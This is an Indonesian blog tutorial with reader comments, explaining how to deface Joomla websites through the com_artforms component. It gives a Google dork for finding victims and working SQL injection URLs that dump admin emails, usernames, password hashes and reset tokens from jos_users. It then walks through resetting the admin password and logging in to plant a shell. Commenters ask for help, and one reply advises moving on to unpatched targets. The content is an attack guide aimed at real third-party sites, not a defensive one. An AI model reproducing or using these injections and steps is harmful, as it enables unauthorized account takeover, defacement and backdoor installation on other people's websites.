Cara Deface Web Dengan Exploit Com ArtForms

Cara Deface Web Dengan Exploit Com ArtForms - Kali ini saya akan membahas tentang exploit joomla com_artforms. Dengan exploit ini, kita akan melakukan reset password sebuah web berbasis joomla. Dan tentunya dengan reset password inilah, kita bisa masuk ke web tersebut sebagai admin dan menanamkan shel/backdoor. Bagaimana caranya? Simak baik - baik.
1. Ketik dork ini ke google : inurl:"option com_artforms"

2. Pilih salah 1 web untuk dijadikan target

3. Masukkan exploit ini : /index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users--
Contoh : www.site.com/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users--

4. Nanti anda akan melihat email dari web tersebut. Copy email tersebut ke notepad.

5. Sekarang anda masuk ke tempat reset password dengan buka tab baru, lalu masukkan kode ini /index.php?option=com_user&view=reset
Contoh : www.site.com/index.php?option=com_user&view=reset

6. Sebelum reset password, anda akan disuruh memasukkan email. Nah, masukkan email yang tadi anda copy ke notepad. Lalu klik "submit"

7. Selanjutnya, anda akan disuruh memasukkan token. Nah anda buka tab baru dan masukkan exploit ini : index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users
Contoh : www.site.com/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users

8. Nanti akan muncul kode aktivasi/token seperti ini admineda7d6142fac40a533b56407a4617371. Yang berwarna merah adalah username webnya, sedangkan yang kuning adalah tokennya. Anda masukkan token tersebut pada form memasukkan token yang tadi. Klik enter.

9. Kini form untuk mereset password sudah muncul, nah masukkan password yang anda inginkan untuk masuk ke web tersebut sebagai admin. Misal : androidnymous

10. Jika berhasil, anda masuk deh ke panel adminnya : www.site.com/administrator

11. Masukkan username yang tadi ditemukan dan password yang sudah anda reset.
Contoh : username = admin, password = androidnymous

12. Dan kini anda berhasil masuk sebagai admin. Saatnya mulai menanam shell anda

Sekian tutorial dari saya, semoga berhasil ^_^

6 comments:

  1. oke bang
    gua doain dicium ama melody :D
    makasih

    BalasHapus
  2. Komentar ini telah dihapus oleh administrator blog.

    BalasHapus
  3. itu cara ngeliat token ny gmana bro ?? gua butuh bantuan tiba
    8. Nanti akan muncul kode aktivasi/token seperti ini admineda7d6142fac40a533b56407a4617371. Yang berwarna merah adalah username webnya, sedangkan yang kuning adalah tokennya. Anda masukkan token tersebut pada form memasukkan token yang tadi. Klik enter.

    tpi mlah kgak ada muncul masukan token gitu bro .. mohon bantuanny

    BalasHapus
  4. Itu karena webnya sudah dipatch alias tidak bisa dijadikan target, jadi cari target yang lain

    BalasHapus
  5. tokennya udh muncul. tpi pas di input error "Token was invalid" knp tuh gan?

    BalasHapus

Hargai penulis dengan memberikan komentar yang baik dan mengklik iklan yang ada

Rules komentar :
1. No SPAM
2. No live link (link aktif)
3. Jika bertanya gunakan akun yang terdaftar
4. Komentar yang tidak pantas akan dihapus oleh admin

 
Top